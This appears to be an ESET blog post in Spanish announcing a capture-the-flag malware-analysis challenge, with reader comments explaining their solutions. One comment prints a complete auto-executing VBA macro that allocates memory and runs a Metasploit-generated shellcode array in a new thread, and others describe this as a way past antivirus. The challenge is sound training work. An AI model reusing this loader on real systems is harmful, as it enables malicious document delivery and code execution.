Desafío ESET #29: Encuentra la acción maliciosa

¡Bienvenidos al primer Desafío ESET de este año!

En este nuevo reto queremos proponerles un desafío tipo Capture the flag, para lo cual ponemos a su disposición un archivo comprimido en formato zip.

Después de descargar el archivo podrán darse cuenta que el mismo se encuentra protegido con una contraseña. Es precisamente este el punto donde empezamos con el desafío. Para esto les queremos dejar la siguiente imagen, que contiene suficiente información para iniciar con la solución.

Codigo_QR

La respuesta se encuentra a partir del análisis del archivo comprimido. Si bien no realiza ninguna acción maliciosa que pueda afectar la información del usuario, recomendamos que los análisis se hagan utilizando un entorno seguro, como puede ser una máquina virtual.

Les recordamos que aquellos que encuentren la solución deben enviar un comentario a este post detallando la forma en la que llegaron a la respuesta. El viernes de la semana que viene estaremos aprobando todos los comentarios y publicando la solución al desafío aquí, en We Live Security en Español.

El primero que logre resolver el reto y que no hubiera ganado alguno de los últimos tres desafíos se llevará una licencia de la última versión de la más completa solución de seguridad, ESET Smart Security además de un importante descuento para que realice alguno de los cursos en nuestra ACADEMIA ESET.

La próxima semana estaremos dando algunas pistas sobre cómo pueden resolver este desafío, así que estén pendientes de nuestras redes sociales. Hasta entonces no daremos ningún tipo de información.

¡Éxitos en la cacería y que lo disfruten!

Actualización

Lo primero que deben hacer es encontrar la clave para extraer el archivo que está comprimido. Para esto deben tener en cuenta que, entre otras características, los códigos QR pueden almacenar información de texto.

Una vez que logren descomprimir el archivo y llegar al archivo ejecutable, la idea es econtrar que acción maliciosa realiza. Para ello pueden ejecutar el archivo y revisar la carpeta C:\Windows\Temp para encontrar qué cambia en ella. Con un análisis en profundidad de estas acciones podrán encontrar la solución al desafío.

¡Éxitos!

Autor , ESET

  • Jose Moruno Cadima

    Hola que tal buenas,

    Primero se procedio con el análisis del QRCODE ya que como es de conocimiento público la imagen almacena información, obviamente previo a ello me puse a analizar metadatos por pura intuición no encontre nada para descomprimir el archivo tras ello analize el QRCODE que me devolvio el siguiente texto.

    RG9Nb3Jl==

    Esta cifrado en Base64 se realiza el descifrado del mismo, que es “DoMore” tras realizar ello descomprimimos y accedemos al ejecutable que estaba protegido con contraseña.

    Tras ejecutar el binario, lo que hace es crear un fichero “Desafio__29” a la par generando “__tmp_rar_sfx_access_check_420156” lo cual hace la ejecución de un ejecutable con el nombre “1.exe” el cual interactua con la dll brouseui.dll ejecutando los atajos de teclado Shift + Esc.

    Un análisis nivel junior! xD espero al menos haber realizado algo.

    Regards,
    Snifer

  • 4815162342

    CodigoQR2.png => [QR Decoder] => RG9Nb3Jl== => [Base64 Decoder] => DoMore [Contraseña] => Desafio_-_29.zip => Desafio__29.exe [ZIP] => Desafio__29 [DOCx] => https://www.malwaretracker.com/docsearch.php?hash=81c28c8810df3031e80411a59a820002 [exploit.office VB Macro auto execute] => ESET-NOD32: VBA/Kryptik.A

  • Erick

    Saludos Ya tengo la solución al desafio:

    Aqui el documento de la resolución:

    https://www.dropbox.com/s/t1nycs7dyvpy772/EOC_Desafio%2029.doc?dl=0

  • ErickO

    No se si recibieron el comentario anterior pero aquí le presento nuevamente

    Resolución

    1.- Encontrando contraseña de Desafio_-_29.zip, al escanear el QR se
    obtiene Se verifica que el código reflejado se determina que esta en base64 por
    “ ==” al descifra con https://www.base64decode.org/
    La
    contraseña es DoMore

    2.- Dentro del comprimido tenemos el siguiente .exe (Desafio__29.exe)

    3.- Al ejecutarse se ejecuta un documento en word la cual ejecuta una macro
    Posible mensaje y a la vez ejecuta un shellcode creado en metasploit.

    Detalle :

    Se verifica que el Desafio__29.exe crear el documento en la carpeta
    temp con el nombre Desafio_29 la cuál es el documento que se muestra
    en el documento, este contiene una macro (shellcode generado por
    metasploit ) que ejecuta el siguiente mensaje

    Link de documento resuelto

    https://www.dropbox.com/s/t1nycs7dyvpy772/EOC_Desafio%2029.doc?dl=0

  • Jose Angel Muñoz

    Os envío el procedimiento:

    Tras descargar el Zip, verificamos el QR Code y vemos que nos aparece el código RG9Nb3Jl== en Base64. Lo decodificamos y obtenemos la contraseña para el zip (DoMore). Tras descomprimir el zip, ejecutamos el comando strings Desafio__29 y vemos que es un archivo rar. Descomprimimos el documento con 7zip y Obtenemos un archivo sin extensión. Vemos que es un archivo word y que virustotal lo detecta con una macro maliciosa. Lo abrimos y vemos el documento que anexo con la macro (sin ejecutar).

  • Ezequieltbh

    Flag: Flag_is_EnjoySaferTechnology
    En mi blog hay una explicacion completa paso a paso de como solucionar el reto
    http://ezequieltbh-security.blogspot.com.ar/2015/03/desafio-eset-29-write-up.html
    Muy interesante el mismo.
    Saludos!

  • Emiliano

    Hola, les comento mi solución:

    La contraseña del archivo está en el código QR y es: “RG9Nb3Jl==” al decodificarla (Base64) es “DoMore”.
    El archivo comprimido es un autoextraible que crea un archivo en c:windowstemp.
    Este archivo creado no tiene extensión, pero al analizarlo en un editor hexa se descubre que es un archivo de word.
    El mismo contiene una macro que carga en memoria un shellcode y lo ejecuta.
    Convirtiendo este shellcode en un archivo ejecutable y analizando los strings que contiene se aprecia uno con el texto “Flag_is_EnjoySaferTechnology”.

    Saludos.

  • Esteban Calle

    Hola, la respuesta que encontré es la siguiente:

    La acción maliciosa (Flag): Flag_is_EnjoySaferTechnology

    Como llegue a esta respuesta, así:

    Primero que todo procedí a descargar el archivo comprimido, según lo indicado, acto seguido escaneé el código QR con el celular, dando el siguiente contenido: RG9Nb3Jl== ; se visualiza que tiene formato de ser una cadena en base64, por lo que procedo a decodificar en linux con: echo RG9Nb3Jl== | base64 -d, lo cual me da como resultado: DoMore.

    Usamos la contraseña en el archivo comprimido y efectivamente nos entrega el archivo

    Desafio__29.exe, lo ejecuto en Windows por si se visualiza alguna pantalla o algo por el estilo, a lo cual no obtengo resultado alguno, por lo que procedo a verificar lo que realiza el ejecutable con el aplicativo Process Monitor; el análisis, arroja que realiza una descompresión en la carpeta temporal de Windows, por lo que me lleva a verificar si es un archivo autoextraible, verificando en la pantalla de propiedades y me encuentro la pestaña “Archivo”, lo cual a abrirla se evidencia que efectivamente es un archivo autoextraible.

    Con esto presente, extraigo el contenido de manera manual con el 7zip y extraigo un archivo llamado Desafio__29, sin extensión alguna, por lo que inmediatamente uso el comando “file” de Linux, para averiguar que tipo de archivo es, arrojando que es un documento de MS Office Word, por lo que lo le añado la extensión .doc y procedo a abrirlo, encontrando que contiene Macros, por lo que accedo a la edición de macros en el cual se puede apreciar todo un código de metasploit en shellcode, para estar seguro, verifico que el archivo Desafio__29.doc, no contenga archivos ocultos con el comando “foremost”, analizo los archivos arrojados (imagenes, zip, y objeto OLE) sin encontrar nada extraño, por lo que procedo a analizar en detalle únicamente la macro con el shellcode.

    Según el formato, se puede referenciar que el código, nombres de macros, y otros, fue creado a partir de metasploit, y contamos con el array de bytes del shellcode, por lo que procedo a decodificar el contenido del array, teniendo en cuenta que una gran parte de este array es el propio exploit y no lo que se desea ejecutar, asi que en una consola de python, copio los byte a una variable de tipo: shellcode=[ 232, 137, …….. , 103, 121, 0], acto seguido convierto el array de bytes al tipo cadena (String) asi: “”.join(map(chr, shellcode)); lo cual me da como resultado los caracteres del exploit, y al final me muestra el texto en claro: Flag_is_EnjoySaferTechnology.

    Lo normal, es que en este exploit, encontremos en ese mismo lugar el conjunto de acciones a seguir definidas por el atacante, ya sea desde ejecutar la calculadora (calc) o bloc de notas (notepad) hasta iniciar una shell remota.

  • Gonzalo Manrique

    Hola, para sacar la contraseña del archivo comprimido, utilize un scaner de codigos qr online, donde el resultado de la lectura fue R69NB3JL== , luego este texto codificado en base 64, lo desencripte en formato texto obteniendo el password para descomprimir ” DoMore” al analizar el archivo Desafio__29.exe con Virustotal da el siguiente resultado https://www.virustotal.com/es/file/7bb85074d84e2c41ba540ab5f117102461f003df1a339bd761af71173aaedfee/analysis/
    Espero haber echo bien. Saludos

  • Jose Angel Muñoz

    ras descargar el Zip, verificamos el QR Code y vemos que nos aparece el código RG9Nb3Jl== en Base64. Lo decodificamos y obtenemos la contraseña para el zip (DoMore). Tras descomprimir el zip, ejecutamos el comando strings Desafio__29 y vemos que es un archivo rar. Descomprimimos el documento con 7zip y Obtenemos un archivo sin extensión. Vemos que es un archivo word y que virustotal lo detecta con una macro maliciosa. Lo abrimos y vemos el documento que anexo con la macro (sin ejecutar).

  • Mando Vzla

    1.-El Archivo Zip Descargado esta protegido con contraseña la cual se obtiene al escanear el codigo QR

    2.-El Codigo QR nos devuelve la cadena “RG9Nb3Jl==” encriptado en Base 64

    3.-la cadena desencriptada quiere decir “DoMore” la cual es la contraseña del archivo Zip.

    4.- El archivo exe contenido en el zip al ejecutarse no hace nada mas que generar 1 archivo dentro de la carpeta temporal de nuestra maquina, el cual se encontro al monitorear la actividad mediante un pequeño codigo.

    5.-El archivo al no saber la extension se requiere abrir como texto plano. al final del mismo tiene la descripcion de un archivo de word “Documento de Microsoft Word 97-2003”

    6.- El archivo al abrirlo describe “Desafío 29
    Laboratorio de Investigación ESET Latinoamérica” mas una imagen, dentro del mismo se nota que tiene ciertos macros.

    7.- Los macros estan ajustados para que se corran al abrir el documento, en el principal existe un arreglo de numeros los cuales se copian dentro de un hilo y se ejecutan, lo importante es que al copiar estos numeros y convertirlos de un arreglo de bytes a caracteres se obtiene el mensaje “Flag_is_EnjoySaferTechnology” de la cual se extrae la bandera “EnjoySaferTechnology”.

  • Venom

    Se inicia por descargar el ZIP el cual se encuentra protegido por una contraseña, se da como inicio la lectura del codigo QR el cual devuelve un codigo en Base64, se procede a decodificarlo y se obtiene la contraseña del .zip.

    Al descomprimir se observa un ejecutable “Desafio__29.exe”, con el fin de realizar un análisis antes de ejecutarlo se procede a extraer el contenido del .exe donde se logra obtener un archivo llamado “Desafio__29” sin ningún tipo de extensión.

    Utilizando el comando File en linux se obtiene que es un documento de texto de Microsoft office por lo cual se procede a dar extensión “.doc”.

    Se asume que al ser un documento de Microsoft Office pueda contener algun tipo de código malicioso incrustado en una Macro por lo que se procede analizar el código con “OfficeMalScanner.exe” el cual muestra como resultado “VB-MACRO CODE WAS FOUND INSIDE THIS FILE!” confirmando que se tiene una macro.

    Se procede a verificar la macro la cual es descomprimida por la misma herramienta y se logra observa que contiene un payload generado por Metasploit con formato de salida VBA.

    Lo cual daría como resultado de la ejecución del documento con macros, la conexión remota a un equipo controlado por un posible atacante.

  • Juan Esteban Valencia Pantoja

    Respuesta: Flag_is_EnjoySaferTechnology

    Bueno para encontrar la flag lo primero fue escanear el código
    QR, al realizar este proceso me arrojaba una palabra codificada en base64, la decodifique y encontré la clave (DoMore) para abrir el archivo cifrado Desafio_29.zip, dentro de este se estaba el ejecutable Desafio_29.exe.

    Después de realizar un análisis al ejecutable me pude dar cuenta que estaba empaquetado con UPX, realice el proceso de des empaquetamiento y continúe con un análisis dinámico del ejecutable, pude observar que el ejecutable arrojaba un archivo llamado Desafio_29 en la carpeta C:WindowsTemp.
    Un indicio de esta acción también fue que detecte una llamada a la API de Windows CreateFileW.

    Al centrar mi atención en el archivo Desafio_29 y después de abrirlo con un editor Hexa descubrí que se trataba de un documento de Microsoft Word (.doc) el cual contenía una Macros, procedí abrir el archivo sin ejecutar la macros pero no encontré nada extraño en el documento, luego realice el proceso de Extracción de la Macros con la ayuda de la herramienta OfficeMalScanner.

    Al analizar la Macros me di cuenta que el código vba fue generado con Metasploit para arquitectura de x32, eso quería decir que nos encontrábamos ante una ejecución
    directa en memoria de shellcode en MS Word Macros. Este código importa las
    funciones VirtualAlloc, RtlMoveMemory y CreateThread de kernel32.dll y ejecuta directamente el shellcode en un nuevo thread.

    Ahora si tenemos que conocer qué acciones hace el shellcode ya que ahí posiblemente estaba la respuesta al reto, la primera prueba fue ejecutar la Macros; Sin embargo a simple vista no nos arroja ningún indicio de la acción que realiza por debajo.

    Para encontrar la acción tenía tres caminos: Realzar un attach del debugger a Microsoft Word (puede llegar a convertirse en una tarea tediosa), utilizar las herramientas de
    OfficeMalScanner para encontrar el offset donde inicia la ejecución del shellcode y a partir de ahí empaquetarlo en un PE nuevo, y realizar el debugging de este nuevo exe. O el ultimo camino y finalmente fue el que elegí para encontrar la flag, fue ejecutar de nuevo la macros y realizar una extracción de las strings que se encontraban en memoria y allí encontré la flag Flag_is_EnjoySaferTechnology.

    Agradezco al equipo de ESET Latinoamerica por el reto, disfrute mucho resolviéndolo y aprendi demasiado.

    Saludos desde Colombia

    Atentamente,

    Juan Esteban Valencia Pantoja
    jevalenciap@gmail.com

  • Daniel Correa

    Lo primero es decodificar el QRCode, el cual contiene la clave del archivo comprimido codificada en Base64: DoMore

    Lo siguiente es desempaquetar el archivo binario con UPX: upx -d Desafio__29.exe

    Teniendo el archivo original y sin ejecutarlo, podemos extraer los recursos contenidos en este haciendo uso de 7zip, allí encontraremos un documento de word que contiene una macro con el siguiente código: https://paste.null-life.com/#/tBsVIYh9LoYX6p4mCUvFIhm+c1t++vligS2NmHnqENC0Ow8GD3oICpg0

    Lo que hace es mover unos valores a la memoria (instrucciones de procesador) para luego ejecutarlos. Podemos crear un pequenio programa en C para imitar el comportamiento y poder depurar el binario: https://paste.null-life.com/#/PZ9sJ7ofCmA53DkC8w3+mRS31+6M/k9QQe9L2HS4se/ZqEAl32KMgKw0

    Por último al depurar el programa vemos que nos muestra la respuesta final en memoria: Flag_is_EnjoySaferTechnology

  • HGB

    EnjoySaferTechnology

  • Miguel baltazar

    El archivo descargado con el nombre CodigoQR2.png trae consigo la clave para descomprimir el archivo esta contraseña esta codificada en sistema base 64, por lo que al decodificarlo muestra la siguiente contraseña: DoMore.

    Una vez que se descomprime el archivo con la contraseña proporcionada, se extrae un archivo llamado Desafio__29.exe cuya firma digital SHA 256 es 7BB85074D84E2C41BA540AB5F117102461F003DF1A339BD761AF71173AAEDFEE

    Posteriormente se analiza con la herramienta ExeInfoPE 0.0.3.3 para verificar si este archivo con extensión .exe se encuentra empaquetado la herramienta arroja un resultado positivo por lo que se extrae el empaquetado. El nuevo archivo desempaquetado tiene un peso de 534 KB, con la siguiente firma digital E8389E618D0B29CEBF4E04CF7FDE1421F1E65D97F7EC58988DA33D2F73CEC741

    Se realizó un análisis dinámico de este archivo pero no se logró observar algún tipo de actividad maliciosa.

    Para tratar de identificar el tipo de archivo se analiza con un edito Hexadecimal, dentro de este archivo se identifican varias cadenas como la siguiente liga http://www.enjoysafertechnology.eu/en, y algunas palabras como Word, se verifican los valores de inicio de archivo con los cuales se comprueba que se trata de un documento Word.

    Al analizarlo con la herramienta IDA Pro se descubre que se trata de un archivo auto extraíble, el cual al ejecutarlo se extrae en la carpeta temporal con el nombre de Desafio_29 con una extensión desconocida, o también es posible extraerlo con la herramienta WinRAR.

    Ahora solo es necesario abrir el documento con Microsoft Office Word, con esto es posible ver su contenido.

  • Gonnza Cabrera

    Aca publico la solución o donde?

    • juan

      Si publicala en los comentarios, el comentari oquedara oculto hasta mañana.

  • Gonnza Cabrera

    La solución se detalla en los siguientes pasos:
    1- Use un servicio de lectura de codigos QR online (http://blog.qr4.nl/Online-QR-Code_Decoder.aspx). Lo que me devolvio un hash en base64 (RG9Nb3Jl==).
    2- Use otro servicio de de-codificación de hashes en dicho algoritmo de encriptación (https://www.base64decode.org), que me dio como resultado “DoMore”, con lo cual pude abrir el zip protegido con contraseña.
    3- Despues de analizar el binario con OllyDbg y PEstudio, pude detectar acciones “no habituales” o “maliciosas” como GetProcAddress() que enmascara funciones ante “Virus Total”, tambien OleInitialize() en la libreria ole32.dll. Tambien virustotal.com me marco mas de una vez codigo malicioso proveniente de W97M.ShellCode.A.

    Me cuesta decantarme por “una acción maliciosa”, pero espero haber acertado con alguna de esas.

  • Facu

    Esta bien subido el archivo .zip?
    Pueden fijarse eso?
    Gracias.

  • Fernando

    Lo detecta como toyano!!!!

  • Carlos Mejia

    El código QR tiene el texto RG9Nb3Jl==, este texto está codificado a base64, usando https://www.base64decode.org/ encontré que la clave del zip era DoMore, luego ejecuté el virus en una máquina virtual con windows, este creó en el directorio Temp un archivo llamado Desafio_29, al abrirlo con word abre un documento con título WeLiveSecurity, desafio 29, y la foto de una mujer con un tatuaje en la espalda con el texto “Enjoy Safer Technology”

  • Jorge Of̲̲̅̅i̲̲̅̅c̲̲̅̅i̲̲̅̅a̲̲

    RG9Nb3Jl==(codigo PQ) que significa DoMore
    al final Un flag
    Flag_is_EnjoySaferTechnology

  • Gonzalo Manrique

    Como comente en mi comentario anterior, el password se consigue leyendo el codigo qr con un lector online de codigos, el texto esta encriptado en base 64, al decodificar con cualquier decodificador online de base 64 se obtiene el password DoMore para descomprimir el archivo. Al ejecutarlo, se crea un archivo en el directorio c:windowstemp llamado desafio__29 sin extension, Si lo abrimos con word, se puede observar que es un archivo con macro que no tiene acciones malisiosas. La url que esta abajo de la imagen, lleva a una pagina de Eset. Saludos

  • Adrián Martínez

    Versión Corta:

    1.- Del QR Code se obtiene “RG9Nb3Jl==”
    http://zxing.org/w/decode?u=http%3A%2F%2Fwww.welivesecurity.com%2Fwp-content%2Fuploads%2F2015%2F03%2FCodigoQR2.png

    2.- El texto anterior está codificado en Base64 que en español es “DoMore”
    # echo RG9Nb3Jl==| base64 -d
    # DoMoreb

    3.- El texto anterior nos permite descomprimir el archivo ZIP obteniendo el archivo Desafio__29.exe (aquí grita ESET VBA/Kryptik.A Troyano)

    4.- Analizando el archivo ejecutable podemos ver que genera un archivo en c:WindowsTempDesafio__29
    https://anubis.iseclab.org/?action=result&task_id=19b8a1a442b9128042da8e1be25d64f0a&format=txt

    5.- Verificando el tipo de archivo con el comando “file” podemos ver que fue hecho en Microsoft Office Word.
    #file Desafio__29
    Desafio__29: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Woody, Template: Normal, Last Saved By: Woody, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Mar 18 19:36:00 2015, Last Saved Time/Date: Wed Mar 18 19:39:00 2015, Number of Pages: 1, Number of Words: 24, Number of Characters: 136, Security: 0

    6.- Abrimos dicho archivo en Word y nos aparece un mensaje “Enjoy Safer Technology” sobre un bonito lienzo, pero también grita que el documento contiene una MACRO.

    7.- Extraemos el código de la MACRO y obtenemos lo siguiente
    # olevba.py –decode -d Desafio__29
    olevba 0.26 – http://decalage.info/python/oletools
    ===============================================================================
    FILE: Desafio__29
    Type: OLE
    ——————————————————————————-
    VBA MACRO ThisDocument.cls
    in file: Desafio__29 – OLE stream: u’Macros/VBA/ThisDocument’
    – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
    (empty macro)
    ——————————————————————————-
    VBA MACRO NewMacros.bas
    in file: Desafio__29 – OLE stream: u’Macros/VBA/NewMacros’
    – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
    #If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib “kernel32” (ByVal Qax As Long, ByVal Aqst As Long, ByVal Ziaw As LongPtr, Jzxlhqtf As Long, ByVal Lgl As Long, Enprhlnh As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib “kernel32” (ByVal Tylqi As Long, ByVal Ikurbor As Long, ByVal Vbzlfwr As Long, ByVal Zusedemv As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib “kernel32” (ByVal Chahuwd As LongPtr, ByRef Qblwth As Any, ByVal Dlnzv As Long) As LongPtr
    #Else
    Private Declare Function CreateThread Lib “kernel32” (ByVal Qax As Long, ByVal Aqst As Long, ByVal Ziaw As Long, Jzxlhqtf As Long, ByVal Lgl As Long, Enprhlnh As Long) As Long
    Private Declare Function VirtualAlloc Lib “kernel32” (ByVal Tylqi As Long, ByVal Ikurbor As Long, ByVal Vbzlfwr As Long, ByVal Zusedemv As Long) As Long
    Private Declare Function RtlMoveMemory Lib “kernel32” (ByVal Chahuwd As Long, ByRef Qblwth As Any, ByVal Dlnzv As Long) As Long
    #End If
    Sub Auto_Open()
    Dim Xosacrosk As Long, Jusofudeq As Variant, Spcwl As Long
    #If VBA7 Then
    Dim Ffhzpyadi As LongPtr, Dsiwfrjf As LongPtr
    #Else
    Dim Ffhzpyadi As Long, Dsiwfrjf As Long
    #End If
    Jusofudeq = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, _
    139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, _
    13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, _
    116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, _
    214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, _
    36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, _
    139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, _
    235, 134, 93, 106, 1, 141, 133, 185, 0, 0, 0, 80, 104, 49, 139, 111, 135, 255, 213, 187, _
    224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, _
    187, 71, 19, 114, 111, 106, 0, 83, 255, 213, 70, 108, 97, 103, 95, 105, 115, 95, 69, 110, _
    106, 111, 121, 83, 97, 102, 101, 114, 84, 101, 99, 104, 110, 111, 108, 111, 103, 121, 0 _
    )
    Ffhzpyadi = VirtualAlloc(0, UBound(Jusofudeq), &H1000, &H40)
    For Spcwl = LBound(Jusofudeq) To UBound(Jusofudeq)
    Xosacrosk = Jusofudeq(Spcwl)
    Dsiwfrjf = RtlMoveMemory(Ffhzpyadi + Spcwl, Xosacrosk, 1)
    Next Spcwl
    Dsiwfrjf = CreateThread(0, 0, Ffhzpyadi, 0, 0, 0)
    End Sub
    Sub AutoOpen()
    Auto_Open
    End Sub
    Sub Workbook_Open()
    Auto_Open
    End Sub

  • Gonnza Cabrera

    Solución al Desafío ESET #29: Encuentra la acción maliciosa.

    1- Subí a un servicio online de decodificación de codigos QR la imagen, lo que me devolvió el hash en Base64 “RG9Nb3Jl==”.
    2- Dicho hash fue desencriptado en otro servicio online, lo que me devolvió “DoMore”.
    3- Con esa palabra pude abrir el .zip protegido por contraseña, el cual contenia el ejecutable. El cual al ejecutarlo generaba un .doc con macros en la carpeta /windows/Temp.
    4- Utilize oledump, un script en Python para analizar los strings de dicho archivo y me centre en el string 8 el cual contenia la macro.
    5- Analizando el macro en VBA, note que la acción maliciosa se encuentra en dicha macro, que lo que hace es ejecutar en memoria una shellcode generada por Metasploit. Para hacerlo en memoria e indetectable por antivirus, utiliza las API de Windows de kernel32.dll y las librerias CreateThread , VirtualAlloc y RtlMoveMemory. de esta forma una vez que el usuario acepte la macro se ejecutara en memoria el primer stage del meterpreter y el AV ni se enterara.

    Gracias por subir el desafio, fue entretenido y muy divertido de resolver a pesar de que en varias etapas declinaba por otros caminos o me confundi.

  • n4pst3r

    Aca mi solucion.

    1. tomo la url e la imagen “http://www.welivesecurity.com/wp-content/uploads/2015/03/CodigoQR2.png” y la ingreso en http://zxing.org/w/decode.jspx, evidenciando “Raw text RG9Nb3Jl==” el cual se encuentra cifrado en un algoritmo llamado base64, el cual pueden decifrar en “http://www.opinionatedgeek.com/dotnet/tools/base64decode/” y como resultado nos da el password “DoMore”…

    2. A continuacion descomprimimos el archivo “.zip”, el cual nos muestra el ejecutable “Desafio__29.exe”, a continuacion procedemos a dar click derecho al ejecutable, si tienen instalado algun compresor de archivos se daran de cuenta que nos da la opcion de extraer, en mi caso con winrar…

    3. Procedemos a extraer lo cual nos da un archivo llamado “Desafio__29” sin extension alguna.. seguido abrimos el arhivo con un editor de texto, “notepad++” y justamente en la linea 1035, se evidencia lo siguiente “Microsoft Offie Word”.

    4. Una vez recolectando la informacion procedemos a cambiar de extension al archivo “Desafio__29” el cual quedaria “Desafio__29.doc” y dentro del documento la solucion…

    http://i.imgur.com/c2iZN3j.png

  • Alvaro Ospina

    La clave del archivo comprimido es DoMore (base64) que sale del QR, después de descomprimir queda un archivo que es de Word que tiene una macro maliciosa. La imagen del archivo de word es la misma que esta en: http://www.enjoysafertechnology.eu/data/img/0024-thumb.jpg

  • anonymouse

    pfff y yo no envié solución pensando que aún faltaba hacer algo despues de encontrar la ejecución del shell de metasploit, para la proxima será!

Síguenos